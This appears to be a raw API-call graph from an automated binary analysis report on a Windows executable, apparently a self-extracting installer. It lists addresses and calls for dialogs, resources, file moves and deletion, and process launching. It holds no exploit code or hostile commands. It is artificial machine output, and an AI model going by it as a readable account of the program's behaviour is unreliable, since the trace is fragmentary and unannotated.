API calls 24394->24397 24494 334fa3 24396->24494 24399 322041 24397->24399 24490 31f937 24399->24490 24400 3220e9 GetStdHandle WriteConsoleW Sleep FreeConsole 24400->24395 24403 314a20 _swprintf 51 API calls 24404 32206f 24403->24404 24405 31f937 53 API calls 24404->24405 24406 32207e 24405->24406 24406->24395 24407->24189 24409 321b3b 2 API calls 24408->24409 24410 32bd2f OleInitialize 24409->24410 24411 32bd52 GdiplusStartup SHGetMalloc 24410->24411 24411->24191 24412->24197 24413->24213 24415 3206aa 24414->24415 24417 3206b4 24414->24417 24519 320627 24415->24519 24418 320729 GetCurrentProcessId 24417->24418 24420 3206ce 24417->24420 24419 320703 24418->24419 24426 320752 24419->24426 24420->24419 24525 3176e9 76 API calls __vswprintf_c_l 24420->24525 24422 3206f1 24526 317871 76 API calls 24422->24526 24424 3206fa 24527 3176e4 RaiseException std::_Xinvalid_argument 24424->24527 24427 32075b _wcslen 24426->24427 24428 320786 24427->24428 24528 320665 24427->24528 24428->24219 24532 3149f3 24430->24532 24433 32c8cd LoadBitmapW 24434 32c8fb GetObjectW 24433->24434 24435 32c8ee 24433->24435 24439 32c90a 24434->24439 24600 32b6d2 FindResourceW 24435->24600 24595 32b5d6 24439->24595 24440 32c960 24452 31ed62 24440->24452 24442 32c93c 24614 32b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24442->24614 24443 32b6d2 12 API calls 24445 32c92d 24443->24445 24445->24442 24447 32c933 DeleteObject 24445->24447 24446 32c944 24615 32b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24446->24615 24447->24442 24449 32c94d 24616 32b81c 8 API calls 24449->24616 24451 32c954 DeleteObject 24451->24440 24627 31ed87 24452->24627 24457 32a0d7 24458 32febe 27 API calls 24457->24458 24459 32a0f6 24458->24459 24459->24214 24462 32bfc0 24460->24462 24461 32c04e 24461->24225 24462->24461 24760 323338 24462->24760 24464 32bfe8 24464->24461 24763 32bc19 SetCurrentDirectoryW 24464->24763 24466 32bff6 __cftof _wcslen 24467 32c02a SHFileOperationW 24466->24467 24467->24461 24469 32bdb0 GdiplusShutdown OleUninitialize 24468->24469 24469->24233 24471->24194 24473 32eda6 24472->24473 24477 32edeb CloseHandle 24472->24477 24474 32eda9 PeekMessageW 24473->24474 24475 32edbb GetMessageW TranslateMessage DispatchMessageW 24474->24475 24476 32eddc WaitForSingleObject 24474->24476 24475->24476 24476->24474 24476->24477 24477->24228 24479 321b8d GetModuleHandleW 24478->24479 24479->24362 24479->24363 24481 31c669 24480->24481 24482 31c62d GetVersionExW 24480->24482 24481->24375 24482->24481 24484 32ffd0 24483->24484 24485 321b48 GetSystemDirectoryW 24484->24485 24486 321b60 24485->24486 24487 321b7e 24485->24487 24488 321b71 LoadLibraryW 24486->24488 24487->24375 24488->24487 24489->24369 24491 31f947 24490->24491 24496 31f968 24491->24496 24495 334fab 24494->24495 24495->24400 24495->24495 24502 31ecd0 24496->24502 24499 31f965 24499->24403 24500 31f98b LoadStringW 24500->24499 24501 31f9a2 LoadStringW 24500->24501 24501->24499 24507 31ec0c 24502->24507 24504 31eced 24506 31ed02 24504->24506 24515 31ed10 26 API calls 24504->24515 24506->24499 24506->24500 24508 31ec24 24507->24508 24514 31eca4 _strncpy 24507->24514 24510 31ec48 24508->24510 24516 3230f5 WideCharToMultiByte 24508->24516 24513 31ec79 24510->24513 24517 31f8d1 50 API calls __vsnprintf 24510->24517 24518 337571 26 API calls 3 library calls 24513->24518 24514->24504 24515->24506 24516->24510 24517->24513 24518->24514 24520 32065f 24519->24520 24521 320630 24519->24521 24520->24417 24522 321b3b 2 API calls 24521->24522 24523 32063a 24522->24523 24523->24520 24524 320640 GetProcAddress GetProcAddress 24523->24524 24524->24520 24525->24422 24526->24424 24527->24419 24529 320673 __InternalCxxFrameHandler 24528->24529 24530 32069c 82 API calls 24529->24530 24531 320697 24530->24531 24531->24428 24533 314a0a __vswprintf_c_l 24532->24533 24536 3372e2 24533->24536 24539 3353a5 24536->24539 24540 3353e5 24539->24540 24541 3353cd 24539->24541 24540->24541 24543 3353ed 24540->24543 24556 33a7eb 20 API calls __dosmaperr 24541->24556 24558 335944 24543->24558 24544 3353d2 24557 3351b9 26 API calls ___std_exception_copy 24544->24557 24549 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24551 314a14 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24549->24551 24550 335475 24567 335cf4 51 API calls 3 library calls 24550->24567 24551->24433 24554 335480 24568 3359c7 20 API calls _free 24554->24568 24555 3353dd 24555->24549 24556->24544 24557->24555 24559 335961 24558->24559 24560 3353fd 24558->24560 24559->24560 24569 33a515 GetLastError 24559->24569 24566 33590f 20 API calls 2 library calls 24560->24566 24562 335982 24589 33aaf6 38 API calls __cftof 24562->24589 24564 33599b 24590 33ab23 38 API calls __cftof 24564->24590 24566->24550 24567->24554 24568->24555 24570 33a531 24569->24570 24571 33a52b 24569->24571 24573 33c2f6 __dosmaperr 20 API calls 24570->24573 24575 33a580 SetLastError 24570->24575 24591 33c01b 11 API calls 2 library calls 24571->24591 24574 33a543 24573->24574 24581 33a54b 24574->24581 24592 33c071 11 API calls 2 library calls 24574->24592 24575->24562 24577 33a66a _free 20 API calls 24579 33a551 24577->24579 24578 33a560 24580 33a567 24578->24580 24578->24581 24582 33a58c SetLastError 24579->24582 24593 33a380 20 API calls __dosmaperr 24580->24593 24581->24577 24594 33a0f4 38 API calls _abort 24582->24594 24584 33a572 24587 33a66a _free 20 API calls 24584->24587 24588 33a579 24587->24588 24588->24575 24588->24582 24589->24564 24590->24560 24591->24570 24592->24578 24593->24584 24617 32b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24595->24617 24597 32b5dd 24598 32b5e9 24597->24598 24618 32b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24597->24618 24598->24440 24598->24442 24598->24443 24601 32b6f5 SizeofResource 24600->24601 24605 32b7e3 24600->24605 24602 32b70c LoadResource 24601->24602 24601->24605 24603 32b721 LockResource 24602->24603 24602->24605 24604 32b732 GlobalAlloc 24603->24604 24603->24605 24604->24605 24606 32b74d GlobalLock 24604->24606 24605->24434 24605->24439 24607 32b7dc GlobalFree 24606->24607 24608 32b75c __InternalCxxFrameHandler 24606->24608 24607->24605 24609 32b7d5 GlobalUnlock 24608->24609 24619 32b636 GdipAlloc 24608->24619 24609->24607 24612 32b7c0 24612->24609 24613 32b7aa GdipCreateHBITMAPFromBitmap 24613->24612 24614->24446 24615->24449 24616->24451 24617->24597 24618->24598 24620 32b655 24619->24620 24621 32b648 24619->24621 24620->24609 24620->24612 24620->24613 24623 32b3c8 24621->24623 24624 32b3f0 GdipCreateBitmapFromStream 24623->24624 24625 32b3e9 GdipCreateBitmapFromStreamICM 24623->24625 24626 32b3f5 24624->24626 24625->24626 24626->24620 24628 31ed95 __EH_prolog 24627->24628 24629 31edc4 GetModuleFileNameW 24628->24629 24630 31edf5 24628->24630 24631 31edde 24629->24631 24673 31ab40 24630->24673 24631->24630 24633 31ee51 24684 337730 24633->24684 24637 31ee25 24637->24633 24639 31f581 78 API calls 24637->24639 24652 31f06a 24637->24652 24638 31ee64 24640 337730 26 API calls 24638->24640 24639->24637 24648 31ee76 ___vcrt_InitializeCriticalSectionEx 24640->24648 24641 31efa5 24641->24652 24720 31b000 81 API calls 24641->24720 24645 31efbf ___std_exception_copy 24646 31ae60 82 API calls 24645->24646 24645->24652 24649 31efe8 ___std_exception_copy 24646->24649 24648->24641 24648->24652 24698 31b110 24648->24698 24714 31ae60 24648->24714 24719 31b000 81 API calls 24648->24719 24651 31eff3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24649->24651 24649->24652 24721 322ed2 MultiByteToWideChar 24649->24721 24651->24652 24653 31f479 24651->24653 24667 3230f5 WideCharToMultiByte 24651->24667 24722 31f8d1 50 API calls __vsnprintf 24651->24722 24723 337571 26 API calls 3 library calls 24651->24723 24724 33a09e 26 API calls ___std_exception_copy 24651->24724 24725 338a18 26 API calls ___std_exception_copy 24651->24725 24726 31f59c 78 API calls 24651->24726 24707 31a801 24652->24707 24663 31f4fe 24653->24663 24727 33a09e 26 API calls ___std_exception_copy 24653->24727 24655 31f48e 24728 338a18 26 API calls ___std_exception_copy 24655->24728 24657 31f534 24662 337730 26 API calls 24657->24662 24659 31f4e6 24729 31f59c 78 API calls 24659->24729 24661 31f581 78 API calls 24661->24663 24664 31f54d 24662->24664 24663->24657 24663->24661 24665 337730 26 API calls 24664->24665 24665->24652 24667->24651 24671 31f5be GetModuleHandleW FindResourceW 24672 31ed75 24671->24672 24672->24457 24674 31ab4a 24673->24674 24675 31abab CreateFileW 24674->24675 24676 31abcc GetLastError 24675->24676 24679 31ac1b 24675->24679 24730 31cf32 24676->24730 24678 31abec 24678->24679 24681 31abf0 CreateFileW GetLastError 24678->24681 24680 31ac5f 24679->24680 24682 31ac45 SetFileTime 24679->24682 24680->24637 24681->24679 24683 31ac15 24681->24683 24682->24680 24683->24679 24685 337769 24684->24685 24686 33776d 24685->24686 24697 337795 24685->24697 24734 33a7eb 20 API calls __dosmaperr 24686->24734 24688 337772 24735 3351b9 26 API calls ___std_exception_copy 24688->24735 24689 337ab9 24691 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24689->24691 24693 337ac6 24691->24693 24692 33777d 24694 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24692->24694 24693->24638 24696 337789 24694->24696 24696->24638 24697->24689 24736 337650 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24697->24736 24699 31b122 24698->24699 24700 31b135 24698->24700 24701 31b140 24699->24701 24737 317800 77 API calls 24699->24737 24700->24701 24702 31b148 SetFilePointer 24700->24702 24701->24648 24702->24701 24704 31b164 GetLastError 24702->24704 24704->24701 24705 31b16e 24704->24705 24705->24701 24738 317800 77 API calls 24705->24738 24708 31a825 24707->24708 24709 31a836 24707->24709 24708->24709 24710 31a831 24708->24710 24711 31a838 24708->24711 24709->24671 24739 31a9ae 24710->24739 24744 31a880 24711->24744 24715 31ae73 24714->24715 24716 31ae6c 24714->24716 24715->24716 24718 31a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24715->24718 24759 3177bd 77 API calls 24715->24759 24716->24648 24718->24715 24719->24648 24720->24645 24721->24651 24722->24651 24723->24651 24724->24651 24725->24651 24726->24651 24727->24655 24728->24659 24729->24663 24731 31cf3f _wcslen 24730->24731 24732 31cfe7 GetCurrentDirectoryW 24731->24732 24733 31cf68 _wcslen 24731->24733 24732->24733 24733->24678 24734->24688 24735->24692 24736->24697 24737->24700 24738->24701 24740 31a9e1 24739->24740 24741 31a9b7 24739->24741 24740->24709 24741->24740 24750 31b470 24741->24750 24745 31a88c 24744->24745 24746 31a8aa 24744->24746 24745->24746 24748 31a898 FindCloseChangeNotification 24745->24748 24747 31a8c9 24746->24747 24758 317685 76 API calls 24746->24758 24747->24709 24748->24746 24751 32ffd0 24750->24751 24752 31b47d DeleteFileW 24751->24752 24753 31b490 24752->24753 24754 31a9df 24752->24754 24755 31cf32 GetCurrentDirectoryW 24753->24755 24754->24709 24756 31b4a4 24755->24756 24756->24754 24757 31b4a8 DeleteFileW 24756->24757 24757->24754 24758->24747 24759->24715 24761 323345 _wcslen 24760->24761 24762 323378 CompareStringW 24761->24762 24762->24464 24763->24466 24765 3390a3 _unexpected 24764->24765 24766 3390aa 24765->24766 24767 3390bc 24765->24767 24803 3391f1 GetModuleHandleW 24766->24803 24788 33bdf1 EnterCriticalSection 24767->24788 24770 3390af 24770->24767 24804 339235 GetModuleHandleExW 24770->24804 24771 339161 24792 3391a1 24771->24792 24774 339138 24777 339150 24774->24777 24783 339e61 _abort 5 API calls 24774->24783 24784 339e61 _abort 5 API calls 24777->24784 24778 3391aa 24812 343550 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24778->24812 24779 33917e 24795 3391b0 24779->24795 24783->24777 24784->24771 24785 3390c3 24785->24771 24785->24774 24789 339bb0 24785->24789 24788->24785 24813 3398e9 24789->24813 24832 33be41 LeaveCriticalSection 24792->24832 24794 33917a 24794->24778 24794->24779 24833 33c236 24795->24833 24798 3391de 24801 339235 _abort 8 API calls 24798->24801 24799 3391be GetPEB 24799->24798 24800 3391ce GetCurrentProcess TerminateProcess 24799->24800 24800->24798 24802 3391e6 ExitProcess 24801->24802 24803->24770 24805 339282 24804->24805 24806 33925f GetProcAddress 24804->24806 24807 339291 24805->24807 24808 339288 FreeLibrary 24805->24808 24809 339274 24806->24809 24810 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24807->24810 24808->24807 24809->24805 24811 3390bb 24810->24811 24811->24767 24816 339898 24813->24816 24815 33990d 24815->24774 24817 3398a4 ___scrt_is_nonwritable_in_current_image 24816->24817 24824 33bdf1 EnterCriticalSection 24817->24824 24819 3398b2 24825 339939 24819->24825 24823 3398d0 _abort 24823->24815 24824->24819 24828 339961 24825->24828 24829 339959 24825->24829 24826 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24827 3398bf 24826->24827 24831 3398dd LeaveCriticalSection _abort 24827->24831 24828->24829 24830 33a66a _free 20 API calls 24828->24830 24829->24826 24830->24829 24831->24823 24832->24794 24834 33c25b 24833->24834 24836 33c251 24833->24836 24835 33be58 __dosmaperr 5 API calls 24834->24835 24835->24836 24837 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24836->24837 24838 3391ba 24837->24838 24838->24798 24838->24799 24839 33d211 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26103 32b410 GdipDisposeImage GdipFree 26179 32c316 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 24944 32f002 24945 32f00f 24944->24945 24946 31f937 53 API calls 24945->24946 24947 32f01c 24946->24947 24948 314a20 _swprintf 51 API calls 24947->24948 24949 32f031 SetDlgItemTextW 24948->24949 24952 32c758 PeekMessageW 24949->24952 24953 32c773 GetMessageW 24952->24953 24954 32c7ac 24952->24954 24955 32c798 TranslateMessage DispatchMessageW 24953->24955 24956 32c789 IsDialogMessageW 24953->24956 24955->24954 24956->24954 24956->24955 26104 311800 86 API calls Concurrency::cancel_current_task 26161 330600 27 API calls 26131 343100 CloseHandle 26181 322f0b GetCPInfo IsDBCSLeadByte 24959 31b20a 24960 31b218 24959->24960 24961 31b21f 24959->24961 24962 31b22c GetStdHandle 24961->24962 24969 31b23b 24961->24969 24962->24969 24963 31b293 WriteFile 24963->24969 24964 31b264 WriteFile 24965 31b25f 24964->24965 24964->24969 24965->24964 24965->24969 24967 31b325 24971 317951 77 API calls 24967->24971 24969->24960 24969->24963 24969->24964 24969->24965 24969->24967 24970 31765a 78 API calls 24969->24970 24970->24969 24971->24960 26132 312570 96 API calls 25100 311075 25101 3204e5 41 API calls 25100->25101 25102 31107a 25101->25102 25105 330372 29 API calls 25102->25105 25104 311084 25105->25104 26107 32c460 99 API calls 26162 33b660 71 API calls _free 26163 32fe61 48 API calls _unexpected 26164 341a60 IsProcessorFeaturePresent 26110 31a850 80 API calls Concurrency::cancel_current_task 26111 32b450 GdipCloneImage GdipAlloc 26183 32e750 70 API calls 26138 331550 51 API calls 2 library calls 26018 32fd58 26019 32fd62 26018->26019 26020 32f9e9 ___delayLoadHelper2@8 14 API calls 26019->26020 26021 32fd6f 26020->26021 26022 316a5f 26023 316a79 26022->26023 26024 316b0f 26022->26024 26023->26024 26025 3205ed 82 API calls 26023->26025 26026 316aa6 26025->26026 26033 3230f5 WideCharToMultiByte 26026->26033 26028 316ac3 26029 316b11 26028->26029 26030 316ad0 26028->26030 26044 316b5f 96 API calls 2 library calls 26029->26044 26030->26024 26034 316def 26030->26034 26033->26028 26036 316e0c 26034->26036 26042 316f3d __InternalCxxFrameHandler __cftof 26034->26042 26037 316fd7 __InternalCxxFrameHandler 26036->26037 26038 316e59 _strlen 26036->26038 26045 320560 26036->26045 26039 32069c 82 API calls 26037->26039 26050 316980 26038->26050 26039->26042 26041 316eee __InternalCxxFrameHandler 26043 32069c 82 API calls 26041->26043 26042->26024 26043->26042 26044->26024 26046 3205ed 82 API calls 26045->26046 26047 32057c 26046->26047 26048 3205ed 82 API calls 26047->26048 26049 32058c 26048->26049 26049->26036 26051 31699c 26050->26051 26052 31698f 26050->26052 26051->26041 26054 3167fc 41 API calls 26052->26054 26054->26051 26165 33c65d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26140 32a540 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26141 330540 46 API calls __RTC_Initialize 26185 330747 29 API calls _abort 26186 32c7b0 100 API calls 26187 330f0f 9 API calls 2 library calls 24005 33bdb0 24006 33bdbb 24005->24006 24008 33bde4 24006->24008 24009 33bde0 24006->24009 24011 33c0ca 24006->24011 24018 33be10 DeleteCriticalSection 24008->24018 24019 33be58 24011->24019 24014 33c10f InitializeCriticalSectionAndSpinCount 24015 33c0fa 24014->24015 24026 330d7c 24015->24026 24017 33c126 24017->24006 24018->24009 24020 33be88 24019->24020 24021 33be84 24019->24021 24020->24014 24020->24015 24021->24020 24022 33bea8 24021->24022 24033 33bef4 24021->24033 24022->24020 24024 33beb4 GetProcAddress 24022->24024 24025 33bec4 __dosmaperr 24024->24025 24025->24020 24027 330d85 IsProcessorFeaturePresent 24026->24027 24028 330d84 24026->24028 24030 330dc7 24027->24030 24028->24017 24040 330d8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24030->24040 24032 330eaa 24032->24017 24034 33bf15 LoadLibraryExW 24033->24034 24038 33bf0a 24033->24038 24035 33bf32 GetLastError 24034->24035 24036 33bf4a 24034->24036 24035->24036 24039 33bf3d LoadLibraryExW 24035->24039 24037 33bf61 FreeLibrary 24036->24037 24036->24038 24037->24038 24038->24021 24039->24036 24040->24032 24041 3110b5 24046 31644d 24041->24046 24045 3110c4 24047 316457 __EH_prolog 24046->24047 24055 31c9d8 GetCurrentProcess GetProcessAffinityMask 24047->24055 24049 316464 24056 3204e5 24049->24056 24051 3164bb 24060 31665c GetCurrentProcess GetProcessAffinityMask 24051->24060 24053 3110ba 24054 330372 29 API calls 24053->24054 24054->24045 24055->24049 24057 3204ef __EH_prolog 24056->24057 24061 314846 41 API calls 24057->24061 24059 32050b 24059->24051 24060->24053 24061->24059 26113 32a4a0 GetClientRect 26114 33d0a0 GetCommandLineA GetCommandLineW 24116 32f5a5 24117 32f54e 24116->24117 24118 32f9e9 ___delayLoadHelper2@8 14 API calls 24117->24118 24118->24117 26142 32d8d8 108 API calls 4 library calls 26143 32f5af 14 API calls ___delayLoadHelper2@8 26116 32b090 28 API calls 26144 33b590 21 API calls 2 library calls 26167 333a90 6 API calls 4 library calls 26190 330790 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26118 311095 44 API calls 24846 32de9d 24847 32df67 24846->24847 24853 32dec0 24846->24853 24859 32d8d8 _wcslen _wcsrchr 24847->24859 24874 32e8df 24847->24874 24850 32e54f 24852 323316 CompareStringW 24852->24853 24853->24847 24853->24852 24854 32dbac SetWindowTextW 24854->24859 24859->24850 24859->24854 24860 32d99a SetFileAttributesW 24859->24860 24864 32d9b4 __cftof _wcslen 24859->24864 24899 323316 CompareStringW 24859->24899 24900 32b65d GetCurrentDirectoryW 24859->24900 24902 31b9ca 6 API calls 24859->24902 24903 31b953 FindClose 24859->24903 24904 32c67e 76 API calls 2 library calls 24859->24904 24905 33521e 24859->24905 24918 32c504 ExpandEnvironmentStringsW 24859->24918 24862 32da54 GetFileAttributesW 24860->24862 24860->24864 24862->24859 24865 32da66 DeleteFileW 24862->24865 24864->24859 24866 32dd76 GetDlgItem SetWindowTextW SendMessageW 24864->24866 24870 32ddb6 SendMessageW 24864->24870 24873 32da30 SHFileOperationW 24864->24873 24901 31cdc0 51 API calls 2 library calls 24864->24901 24865->24859 24867 32da77 24865->24867 24866->24864 24868 314a20 _swprintf 51 API calls 24867->24868 24869 32da97 GetFileAttributesW 24868->24869 24869->24867 24871 32daac MoveFileW 24869->24871 24870->24859 24871->24859 24872 32dac4 MoveFileExW 24871->24872 24872->24859 24873->24862 24875 32e8e9 __cftof _wcslen 24874->24875 24876 32e9f5 24875->24876 24877 32eb10 24875->24877 24880 32eb37 24875->24880 24922 323316 CompareStringW 24875->24922 24919 31b4c1 24876->24919 24877->24880 24882 32eb2e ShowWindow 24877->24882 24880->24859 24882->24880 24883 32ea29 ShellExecuteExW 24883->24880 24885 32ea3c 24883->24885 24887 32ea60 IsWindowVisible 24885->24887 24888 32ea75 WaitForInputIdle 24885->24888 24889 32eacb CloseHandle 24885->24889 24886 32ea21 24886->24883 24887->24888 24890 32ea6b ShowWindow 24887->24890 24891 32ed8b 6 API calls 24888->24891 24893 32eae4 24889->24893 24894 32ead9 24889->24894 24890->24888 24892 32ea8d 24891->24892 24892->24889 24896 32eaa0 GetExitCodeProcess 24892->24896 24893->24877 24924 323316 CompareStringW 24894->24924 24896->24889 24897 32eab3 24896->24897 24897->24889 24899->24859 24900->24859 24901->24864 24902->24859 24903->24859 24904->24859 24906 33a6a4 24905->24906 24907 33a6b1 24906->24907 24908 33a6bc 24906->24908 24933 33a7fe 24907->24933 24910 33a6c4 24908->24910 24916 33a6cd __dosmaperr 24908->24916 24913 33a66a _free 20 API calls 24910->24913 24911 33a6d2 24940 33a7eb 20 API calls __dosmaperr 24911->24940 24912 33a6f7 HeapReAlloc 24915 33a6b9 24912->24915 24912->24916 24913->24915 24915->24859 24916->24911 24916->24912 24941 338e5c 7 API calls 2 library calls 24916->24941 24918->24859 24925 31b4d3 24919->24925 24922->24876 24923 31cad4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24923->24886 24924->24893 24926 32ffd0 24925->24926 24927 31b4e0 GetFileAttributesW 24926->24927 24928 31b4f1 24927->24928 24929 31b4ca 24927->24929 24930 31cf32 GetCurrentDirectoryW 24928->24930 24929->24883 24929->24923 24931 31b505 24930->24931 24931->24929 24932 31b509 GetFileAttributesW 24931->24932 24932->24929 24934 33a83c 24933->24934 24938 33a80c __dosmaperr 24933->24938 24943 33a7eb 20 API calls __dosmaperr 24934->24943 24936 33a827 RtlAllocateHeap 24937 33a83a 24936->24937 24936->24938 24937->24915 24938->24934 24938->24936 24942 338e5c 7 API calls 2 library calls 24938->24942 24940->24915 24941->24916 24942->24938 24943->24937 26119 328880 133 API calls 26146 331180 RaiseException std::_Xinvalid_argument _com_error::_com_error 26168 333e8b 38 API calls 4 library calls 26170 32c2f3 78 API calls 24976 33ccf0 24977 33cd02 24976->24977 24978 33ccf9 24976->24978 24980 33cbe7 24978->24980 24981 33a515 _unexpected 38 API calls 24980->24981 24982 33cbf4 24981->24982 25000 33cd0e 24982->25000 24984 33cbfc 25009 33c97b 24984->25009 24987 33cc13 24987->24977 24988 33a7fe __vsnwprintf_l 21 API calls 24989 33cc24 24988->24989 24999 33cc56 24989->24999 25016 33cdb0 24989->25016 24992 33a66a _free 20 API calls 24992->24987 24993 33cc51 25026 33a7eb 20 API calls __dosmaperr 24993->25026 24995 33cc6e 24996 33cc9a 24995->24996 24997 33a66a _free 20 API calls 24995->24997 24996->24999 25027 33c851 26 API calls 24996->25027 24997->24996 24999->24992 25001 33cd1a ___scrt_is_nonwritable_in_current_image 25000->25001 25002 33a515 _unexpected 38 API calls 25001->25002 25007 33cd24 25002->25007 25004 33cda8 _abort 25004->24984 25007->25004 25008 33a66a _free 20 API calls 25007->25008 25028 33a0f4 38 API calls _abort 25007->25028 25029 33bdf1 EnterCriticalSection 25007->25029 25030 33cd9f LeaveCriticalSection _abort 25007->25030 25008->25007 25010 335944 __cftof 38 API calls 25009->25010 25011 33c98d 25010->25011 25012 33c9ae 25011->25012 25013 33c99c GetOEMCP 25011->25013 25014 33c9b3 GetACP 25012->25014 25015 33c9c5 25012->25015 25013->25015 25014->25015 25015->24987 25015->24988 25017 33c97b 40 API calls 25016->25017 25018 33cdcf 25017->25018 25021 33ce20 IsValidCodePage 25018->25021 25023 33cdd6 25018->25023 25024 33ce45 __cftof 25018->25024 25019 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25020 33cc49 25019->25020 25020->24993 25020->24995 25022 33ce32 GetCPInfo 25021->25022 25021->25023 25022->25023 25022->25024 25023->25019 25031 33ca53 GetCPInfo 25024->25031 25026->24999 25027->24999 25029->25007 25030->25007 25032 33cb37 25031->25032 25037 33ca8d 25031->25037 25034 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25032->25034 25036 33cbe3 25034->25036 25036->25023 25041 33db48 25037->25041 25040 33bd38 __vsnwprintf_l 43 API calls 25040->25032 25042 335944 __cftof 38 API calls 25041->25042 25043 33db68 MultiByteToWideChar 25042->25043 25045 33dba6 25043->25045 25051 33dc3e 25043->25051 25047 33a7fe __vsnwprintf_l 21 API calls 25045->25047 25052 33dbc7 __cftof __vsnwprintf_l 25045->25052 25046 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25048 33caee 25046->25048 25047->25052 25055 33bd38 25048->25055 25049 33dc38 25060 33bd83 20 API calls _free 25049->25060 25051->25046 25052->25049 25053 33dc0c MultiByteToWideChar 25052->25053 25053->25049 25054 33dc28 GetStringTypeW 25053->25054 25054->25049 25056 335944 __cftof 38 API calls 25055->25056 25057 33bd4b 25056->25057 25061 33bb1b 25057->25061 25060->25051 25062 33bb36 __vsnwprintf_l 25061->25062 25063 33bb5c MultiByteToWideChar 25062->25063 25064 33bd10 25063->25064 25065 33bb86 25063->25065 25066 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25064->25066 25070 33a7fe __vsnwprintf_l 21 API calls 25065->25070 25071 33bba7 __vsnwprintf_l 25065->25071 25067 33bd23 25066->25067 25067->25040 25068 33bbf0 MultiByteToWideChar 25069 33bc5c 25068->25069 25072 33bc09 25068->25072 25097 33bd83 20 API calls _free 25069->25097 25070->25071 25071->25068 25071->25069 25088 33c12c 25072->25088 25076 33bc33 25076->25069 25080 33c12c __vsnwprintf_l 11 API calls 25076->25080 25077 33bc6b 25078 33a7fe __vsnwprintf_l 21 API calls 25077->25078 25082 33bc8c __vsnwprintf_l 25077->25082 25078->25082 25079 33bd01 25096 33bd83 20 API calls _free 25079->25096 25080->25069 25082->25079 25083 33c12c __vsnwprintf_l 11 API calls 25082->25083 25084 33bce0 25083->25084 25084->25079 25085 33bcef WideCharToMultiByte 25084->25085 25085->25079 25086 33bd2f 25085->25086 25098 33bd83 20 API calls _free 25086->25098 25089 33be58 __dosmaperr 5 API calls 25088->25089 25090 33c153 25089->25090 25093 33c15c 25090->25093 25099 33c1b4 10 API calls 3 library calls 25090->25099 25092 33c19c LCMapStringW 25092->25093 25094 330d7c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25093->25094 25095 33bc20 25094->25095 25095->25069 25095->25076 25095->25077 25096->25069 25097->25064 25098->25069 25099->25092 26121 3310f0 LocalFree 26147 33d1f0 GetProcessHeap 26148 32edf1 DialogBoxParamW 25111 3113fd 43 API calls 2 library calls 26149 32bde0 73 API calls 26192 3373e0 QueryPerformanceFrequency QueryPerformanceCounter 26171 33c66e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26151 3421d5 21 API calls 2 library calls 25122 32c9d0 25123 32c9da __EH_prolog 25122->25123 25294 3112f6 25123->25294 25126 32ca31 25127 32ca1a 25127->25126 25131 32ca8b 25127->25131 25132 32ca28 25127->25132 25128 32d10b 25380 32e7ee 25128->25380 25135 32cb1e GetDlgItemTextW 25131->25135 25141 32caa1 25131->25141 25136 32ca68 25132->25136 25137 32ca2c 25132->25137 25133 32d126 SendMessageW 25134 32d134 25133->25134 25138 32d14e GetDlgItem SendMessageW 25134->25138 25139 32d13d SendDlgItemMessageW 25134->25139 25135->25136 25140 32cb5b 25135->25140 25136->25126 25144 32cb4f EndDialog 25136->25144 25137->25126 25142 31f937 53 API calls 25137->25142 25398 32b65d GetCurrentDirectoryW 25138->25398 25139->25138 25145 32cb70 GetDlgItem 25140->25145 25292 32cb64 25140->25292 25146 31f937 53 API calls 25141->25146 25147 32ca4b 25142->25147 25144->25126 25149 32cba7 SetFocus 25145->25149 25150 32cb84 SendMessageW SendMessageW 25145->25150 25151 32cabe SetDlgItemTextW 25146->25151 25420 31122f SHGetMalloc 25147->25420 25148 32d17e GetDlgItem 25153 32d1a1 SetWindowTextW 25148->25153 25154 32d19b 25148->25154 25155 32cbb7 25149->25155 25164 32cbc3 25149->25164 25150->25149 25156 32cac9 25151->25156 25399 32bbc0 GetClassNameW 25153->25399 25154->25153 25160 31f937 53 API calls 25155->25160 25156->25126 25163 32cad6 GetMessageW 25156->25163 25157 32ca52 25157->25126 25165 32d3f8 SetDlgItemTextW 25157->25165 25158 32d051 25161 31f937 53 API calls 25158->25161 25184 32cbc1 25160->25184 25166 32d061 SetDlgItemTextW 25161->25166 25163->25126 25168 32caed IsDialogMessageW 25163->25168 25173 31f937 53 API calls 25164->25173 25165->25126 25171 32d075 25166->25171 25168->25156 25169 32cafc TranslateMessage DispatchMessageW 25168->25169 25169->25156 25177 31f937 53 API calls 25171->25177 25176 32cbfa 25173->25176 25174 32cc1d 25180 32cc51 25174->25180 25181 31b4c1 3 API calls 